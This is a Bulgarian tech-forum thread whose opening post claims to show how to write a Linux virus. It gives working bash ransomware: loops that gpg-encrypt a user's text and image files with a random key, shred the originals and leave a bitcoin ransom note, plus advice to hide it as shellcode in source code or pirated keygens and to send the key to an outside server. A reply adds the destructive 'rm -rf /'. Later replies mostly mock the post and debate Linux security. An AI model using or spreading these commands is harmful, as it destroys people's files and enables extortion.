Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Как се пише вирус за Линукс. Пример. Митът за непробиваемият и незасегнат от вируси Linux е разбит.

Featured Replies

Та, няма нищо сигурно на този свят :)

С малко фантазия и няколко реда код могат да се сътворят такива бели, че после оправия да няма. 

Всеки запален по Линукс твърди, че е недосегаем…. е, не съвсем.

https://unix-bg.org/

ВНИМАНИЕ! За всички тестове съм използвал виртуална машина, която е изключена от мрежата! Всякакви експерименти, подобни на този са изцяло на ваша отговорност, и нямате право да ми се сърдите, ако нещо се обърка и загубите файловете си! 

Казвате си “аз съм с Линукс” и се мислите за недосегаеми?

Митът за непробиваемият и незасегнат от вируси Linux е разбит.остатъчно е просто да имате Wine… и не сте съвсем недосегаеми.

Цитат

Та, един пример:

Цитат

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; done

И за да кажем как да ни платят, и да сме истински хакери, като омажем максимално оригиналните файлове:

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done

като след find-а може да има колкто си искаме *.нещоси, като и накрая като се добави едно rm $f, или за да сме още по-зли: shred $f;

Това нещо ще криптира всички *.txt., *.jpg, *.png файлове. Този списък може да се разшири до безкрайност.

Това чудо например се преобразува в shellcode, набутва се в накой дълъг .c файл, който е част от някаква програмка, която потребителят ще се излъже да комилира и стартира, и… стават чудеса 

Друг вариант е да се изсипе чрез някой торент – напр. като крак, като keygen, като част от някаква програмка… варианти има хиляди.

Едно стартиране, и файловете са криптирани безвъзвратно…

Как ще се подаде паролата (в случая – 1234) и дали по някакъв начин скрипта ще я вземе “отвън”, ще я генерира на момента (напр. tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs) и ще я изпрати към външен сървър, за да я съхранява там – вариантите пак са много.

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`
for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo $ENCRYPT | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done
echo “$ENCRYPT”>PRIVATE.KEY;

Ако ще пробвате нещо – ключа се записва в PRIVATE.KEY в текущата директория. Декриптиранрто става по обратен ред, именно:

PW=`cat PRIVATE.KEY`

echo $PW | gpg –batch –no-tty –yes –passphrase-fd 0 -d -o original-decrypted-file.txt encrypted-file.txt.enc

Та, в 90% от случаите не са виновни операционните системи, а хората които работят с тях. Защо ли? Да вземем за пример Виндовс:

Инсталират се основно пиратски версии, от Замунда. Първата работа на инсталиращия е да спре update-ите на Виндовса… познавам хора, които се мислят за особено големи разбирачи, и спират упдейтите дори на лицензен Виндовс, защото, цитирам: “закво са ми тия упдейти, само ми бавят компютъра”.

За Линукс пък заблудата е друга: че такива атаки там били невъзможни. Не, не са невъзможни а просто Линукс не е интересен за хакерите.

Това, което пишат масово по форуми и блогове – “инсталирайте си Линукс и ще забравите за вирусите” изобщо, ама изобщо не е така. Варианти винаги има! Дали нещо ще се изпълни през Wine, дали ще е забутано някъде – няма никакво значение. А на този криптиращ скрипт не му трябват никакви права – той ще си свърши работата в потребителската директория, а с малко тунинг (find / -writable) ще претърси цялата система за файлове, които са с права за писане за съответният потребител и ще ги омаже както си иска. Ако пък някой вземе, че го пусне с администраторски права…. става мазало. И ако нямаш паролата, за да изпълниш gpg -d $f.enc

Някой ще каже “ама аз може да нямам gpg”. Може бе, ама… мисля, че идеята е ясна.

 

Хм, така като гледам ползва urandom, shred, gpg. Значи ще му трябва приблизително един ден изпълнение за потребителската директория. :D

Единственото по-специално е че прилича на плюнка, което линуксарите харесват, но за сметка на това липсва механизъм за разпространение и узурпиране. Тоест няма нищо хакерско.

Какъв мит? Никой не може да те спаси от албански вирус, т.е. стартираш нещо, което не трябва. Разликата, Виндовс интегрира дълбоко боклуците си, ActiveX и макроси и прочие бози по офиса и резултата е плачевен. Никой под Линукс не може да те принуди да изпълниш скрипта по-горе, ако не си достатъчно прост да го направиш нарочно. Освен това, може да си записваш скриптове и изпълними файлове да се свалят в директория, която си монтирал без права за изпълнение.

Редактирано от bvbfan (преглед на промените)

Навремето докато ползвах Windows в домашни условия не смеех да си покажа носа в Интернет без антивирусна. Сега под Linux не е така. А навиците ми не са се променили ни най-малко. Използвам си същите сайтове, както и миналото. Също така от любопитство следя секцията в нашият форум Сигурност и антивирусна защита, така и подобна но на руски език цък. От прочетеното не съм видял нито един да се е заразил под Linux,...нито един и всички молби за помощ са от Windows потребители. Определено живота под Windows е по-труден. Всеки ден го изпитвам на гърба си в офиса, с повишено внимание към това което отварям по пощата и архива дали ми е актуален. 

Ето ти още един пример , малко по кратък и доста по опасен от твоя Вирус :P .

# rm -rf /

Използвам случая да честитя рождения ден на царя ! :D 

Feliz cumpleaños !

Редактирано от ivoarch (преглед на промените)

преди 9 минути, ivoarch написа:

Използвам случая да честитя рождения ден на царя ! :D 

Случая е рожденния ден или rm rf? :D

Използвам поредната тема на @kalansuv ,просто защото знам ,че  няма да мине без спам , офтопик , философия, Linux , бла бла и майтапи :D .

преди 7 минути, plamen74 написа:

kalansuv 

Чудя се кога ще спреш с простотиите си в този форум???

 

Нека има такива кадри, теса ценни за Linux общността ;) . 

Мммм, да разваляш любимото ми rm -Rf с малка буква си е кощунство. Знаеш ли колко компа съм заразил така, чет нямат. (А обикновенно тествам реално, не на виртуалка, заради "слабост", но ... баце, тва е мор, Линукса пада кат презряла круша). ;) ...обаче тва не съм пробвал, щото е (оче)видно какво прави. (А някъде банваха за подтикване към това, май).

Значи, мислил съм си и не мога да си отговоря - защо като изтрия mp3-ката плеъра продължава да я свири. Това не е ли уязвимост, според мене е. АЗ съм я открил, не Автора ;). Демек - има вирус, триеш го, а той продължава да гази, нали така.

Редактирано от бат'начо (преглед на промените)

Ааа ей го бота бре, кой каза, че са го филтрирали :D Тука си е и днес таман навреме петъчно отново зареден ни забавлява със "смислени" теми в раздела.

Редактирано от exwol (преглед на промените)

преди 2 часа, ivoarch написа:

Използвам поредната тема на @kalansuv ,просто защото знам ,че  няма да мине без спам , офтопик , философия, Linux , бла бла и майтапи :D .

Нека има такива кадри, теса ценни за Linux общността ;) . 

Не няма да спре. То просто си го влече простотията.

преди 22 минути, exwol написа:

Ааа ей го бота бре, кой каза, че са го филтрирали :D Тука си е и днес таман навреме петъчно отново зареден ни забавлява със "смислени" теми в раздела.

Повярвай, че никой няма да го филтрира. Политиката във форума е да се пише, а това дали нещата са верни и доказани е без значение.

преди 3 часа, svetliof написа:

Навремето докато ползвах Windows в домашни условия не смеех да си покажа носа в Интернет без антивирусна. Сега под Linux не е така. А навиците ми не са се променили ни най-малко. Използвам си същите сайтове, както и миналото. Също така от любопитство следя секцията в нашият форум Сигурност и антивирусна защита, така и подобна но на руски език цък. От прочетеното не съм видял нито един да се е заразил под Linux,...нито един и всички молби за помощ са от Windows потребители. Определено живота под Windows е по-труден. Всеки ден го изпитвам на гърба си в офиса, с повишено внимание към това което отварям по пощата и архива дали ми е актуален. 

С обществен (в т.ч. и служебен) комп, ползван от всякакви идиоти, е напълно нормално да гледаш под лупа какво отваряш. От няколко години вече не ползвам антивирусни, защото не ми трябват. Оня ден, ей така за гъзария, инсталирах една и ако не ме домързи, утре ще я махна.

А колкото до т'ва, че нямало нито един заразен, в тази статия са описани известни вируси за Линукс. След като хората знаят за тези вируси, значи все пак някой се е заразил с тях:
https://www.unixmen.com/meet-linux-viruses/

преди 1 час, Емил Костов написа:

Повярвай, че никой няма да го филтрира. Политиката във форума е да се пише, а това дали нещата са верни и доказани е без значение.

Хахахаха, е знам, че няма да го филтрират, но то не е и нужно. Аз го написах просто така, защото се загуби. Кой мислиш, че би му се вързал. Само някой  също като него дето няма никаква идея от ти неща. Та той една елементарна програма не може да си инсталира на машината, какво остава да се занимава сериозно със security research. Пичагата е забавен с глупостта си и точно това е якото. Трябва от време на време да се разпуска с нещо несериозно :D Нека си поства човека. Сега няма му убиваме ентусиазма. Постарал се е, намерил някакъв блог ли е знам ли какво е там - някаква пародия писна от подобен индивид, впечатлил се човека и бърза да сподели, няма лошо бисери да се трупат.

Редактирано от exwol (преглед на промените)

преди 9 часа, exwol написа:

Хахахаха, е знам, че няма да го филтрират, но то не е и нужно. Аз го написах просто така, защото се загуби. Кой мислиш, че би му се вързал. Само някой  също като него дето няма никаква идея от ти неща. Та той една елементарна програма не може да си инсталира на машината, какво остава да се занимава сериозно със security research. Пичагата е забавен с глупостта си и точно това е якото. Трябва от време на време да се разпуска с нещо несериозно :D Нека си поства човека. Сега няма му убиваме ентусиазма. Постарал се е, намерил някакъв блог ли е знам ли какво е там - някаква пародия писна от подобен индивид, впечатлил се човека и бърза да сподели, няма лошо бисери да се трупат.

Проблема е, че се връзват. Повечето хора от днешната младеж нямат логическо мислене и не могат да разберат дали се говори сериозно или не. И нещата все повече ще се засилват.

преди 22 часа, Емил Костов написа:

Проблема е, че се връзват. Повечето хора от днешната младеж нямат логическо мислене и не могат да разберат дали се говори сериозно или не. И нещата все повече ще се засилват.

Така си е съгласен съм, но срещу глупостта на хората се води борба от време оно. И като казвам глупостта, естествено нямам предвид хора, които не са запознати в дадена област, защото това е напълно нормално, всеки се развива където има интерес. Аз по-скоро визирам онези, на които им липсва всякаква логическа мисъл и наченки на възприемане. Проблема обаче си е само за тия де нямат нищо между ушите си. На който му увира главата върви нагоре, развива се и си решава проблемите, дори и извличайки полезното когато са потърсили помощ. За останалите остава само да тъпчат на едно място в измисления си свят, да се оплакват от всичко и все нещо да им е криво. Да злобеят на дребно и да проклинат жалката си участ, тъй че нормалните мислещи хора изобщо не ги интересува как и по какъв начин некадърниците се оправят в тоя свят.

Няма земна сила, която да ме върне отново в света на Windows на домашният ми компютър. Linux ми дава всичко от което се нуждая - безплатна OS, програми, надежност и функционалност. Как няма една програма под Windows, която да ми трябва? Автора на темата говори за надежност и сигурност. Да се върна към тези моменти/факти ли цък, или цък ? Не, мерси. Изборър ми е Linux Mint.

  • Автор

Моят избор е Ubuntu Mate

Аз нещо не можах да схвана ... Това демонстрация как се ползва GPG ли е?
Има 1000 библиотеки за криптиране. Това какво доказва в случая?

  • Автор
преди 5 минути, borovaka написа:

 Това какво доказва в случая?

Заглавието на темата, драги.

преди 13 минути, kalansuv написа:

Заглавието на темата, драги.

"Драги" аз заглавието на темата го видях. Ама нещо не разбирам ти какво си демонстрирал под заглавието и какво доказваш.

Както и да е, аз не ги разбирам мн мн тези неща. Успех

p.s.
Ако мислиш да пишеш такива неща, може примерно да разгледаш libsodium/NaCL, с това PGP  мисля, че ще се озориш повечко да постигнеш желаната цел - незабележимо и бързо криптиране.

Редактирано от borovaka (преглед на промените)

Никой не казва, че Linux е безопасен или неуязвим, но самото обществото на Linux е обединено и ще засекат твоя вирус. Защо не се насочиш към това, как да правиш кръпки? Хакерите използват Линукс. Какво мислиш за Kali Linux?

Изпратено от моят GT-I9301I с помощта на Tapatalk

преди 6 минути, Rumen Gotsev написа:

Никой не казва, че Linux е безопасен или неуязвим, но самото обществото на Linux е обединено и ще засекат твоя вирус. Защо не се насочиш към това, как да правиш кръпки? Хакерите използват Линукс. Какво мислиш за Kali Linux?

Изпратено от моят GT-I9301I с помощта на Tapatalk
 

Това не е вирус - това е демонстрация на криптиране на файлове с GnuPG. За да е вирус трябва да отговаря на доста други характеристики.

на 6/18/2017 в 22:26, borovaka написа:

Това не е вирус - това е демонстрация на криптиране на файлове с GnuPG. За да е вирус трябва да отговаря на доста други характеристики.

Важното, че митът е разбит! :emoji_smiley-13:

Доколкото си спомням премията за успешно пускане на Windows-ки вирус с Wine чака около 6 години и беше взета едва 2011.

Тук по-скоро е важен критерия осигурени ли са механизми за автоматично активиране и повишаване на привилегиите на вируса. В това отношение Linux определено до скоро изоставаше. За щастие осъвремените браузъри и работни среди вече предлагат известен избор на варианти за прозрачна активация, а многократно дублираните системи за елевация на привилегии в модерните дистрибуции дават шанс активирания вирус да не се окаже безполезен.

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.